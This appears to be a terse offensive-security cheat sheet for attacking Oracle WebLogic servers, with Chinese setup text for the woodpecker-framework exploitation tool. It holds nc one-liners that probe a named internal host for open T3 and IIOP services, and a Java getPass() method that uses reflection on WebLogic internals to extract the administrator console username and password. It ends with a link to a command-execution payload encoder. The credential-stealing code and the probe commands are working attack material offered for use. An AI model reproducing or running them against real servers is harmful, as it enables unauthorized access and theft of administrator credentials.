将插件复制到 woodpecker-framwork/plugin 目录下面,启动 java -jar woodpecker-framework.1.3.3.jar
from https://github.com/woodpecker-appstore
check T3 isOpen:
echo 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'|nc 10.20.31.189 7001
check IIOP isOpen:
echo "GIOP\x01\x02\x00\x03\x00\x00\x00\x17\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0bNameService"| nc 10.20.31.189 7001
https://twitter.com/jas502n/status/1467122190760177664?s=20
Use T3 protocol Get weblogic console username, password
public static String getPass() {
try {
ClassLoader l = Thread.currentThread().getContextClassLoader();
Class HttpDataTransferHandler = l.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler");
Class ManagementService = l.loadClass("weblogic.management.provider.ManagementService");
Class AuthenticatedSubject = l.loadClass("weblogic.security.acl.internal.AuthenticatedSubject");
Class PropertyService = l.loadClass("weblogic.management.provider.PropertyService");
Field f = HttpDataTransferHandler.getDeclaredField("KERNE_ID");
f.setAccessible(true);
Method mm = ManagementService.getMethod("getPropertyService", AuthenticatedSubject);
mm.setAccessible(true);
Object prop = mm.invoke((Object) null, f.get((Object) null));
Method m1 = PropertyService.getMethod("getTimestamp1");
Method m2 = PropertyService.getMethod("getTimestamp2");
m1.setAccessible(true);
m2.setAccessible(true);
String name = (String) m1.invoke(prop);
String pass = (String) m2.invoke(prop);
return "name:" + name + ",pass:" + pass + ";";
} catch (Exception var12) {
return var12.toString();
}
}
http://jackson-t.ca/runtime-exec-payloads.html
